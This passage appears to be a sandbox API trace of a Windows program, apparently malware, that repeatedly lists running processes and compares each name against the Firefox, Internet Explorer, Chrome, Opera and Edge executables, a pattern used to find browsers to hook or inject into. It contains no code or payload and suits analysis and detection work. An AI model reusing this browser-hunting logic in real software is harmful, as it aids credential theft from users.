lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0261.270] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0261.270] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0261.270] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0261.270] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0261.270] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0261.271] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0261.271] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0261.271] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0261.271] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0261.271] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.271] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0261.271] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0261.271] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0261.271] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0261.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0261.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0261.272] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0261.272] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0261.272] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0261.272] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0261.272] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0261.273] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0261.273] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0261.273] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0261.273] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0261.273] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0261.273] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0261.273] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0261.273] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0261.273] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0261.273] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0261.274] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0261.274] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0261.274] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0261.274] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0261.274] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0261.274] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0261.274] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0261.274] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0261.275] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0261.275] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0261.275] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0261.275] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0261.275] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0261.275] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0261.275] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0261.276] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0261.276] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0261.276] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0261.276] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0261.276] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.276] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0261.276] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0261.276] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0261.276] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0261.276] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0261.276] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.276] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0261.277] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0261.277] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0261.277] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0261.277] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0261.277] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.277] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0261.278] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0261.278] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0261.278] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0261.278] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0261.278] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0261.278] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0261.278] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0261.278] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0261.278] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0261.278] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0261.279] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0261.279] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0261.279] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0261.279] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0261.279] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0261.280] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0261.280] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0261.280] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0261.280] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0261.280] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0261.280] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0261.280] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0261.280] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0261.280] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0261.280] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0261.281] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0261.281] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0261.281] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0261.281] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0261.281] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0261.281] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0261.281] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0261.281] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0261.281] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0261.282] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.282] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0261.282] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0261.282] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0261.282] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0261.282] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.283] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.283] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.283] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.283] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.283] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.283] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0261.283] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0261.283] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0261.283] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0261.283] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.284] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.284] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.284] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.284] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.284] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0261.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0261.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0261.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0261.285] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.285] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.285] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.285] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.285] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0261.285] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0261.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0261.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0261.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0261.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.286] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.286] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.286] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.286] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0261.286] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.287] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0261.288] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0261.289] CloseHandle (hObject=0xe8) returned 1 [0261.289] Sleep (dwMilliseconds=0x3e8) [0262.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0263.167] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.167] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0263.167] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0263.167] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0263.167] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0263.167] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0263.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.168] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0263.168] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0263.168] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0263.168] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0263.168] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0263.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.168] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0263.168] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0263.169] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0263.169] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0263.169] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.169] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0263.169] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0263.169] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0263.169] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0263.169] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.170] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0263.170] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0263.170] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0263.170] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0263.170] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.170] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0263.170] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0263.170] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0263.170] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0263.170] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 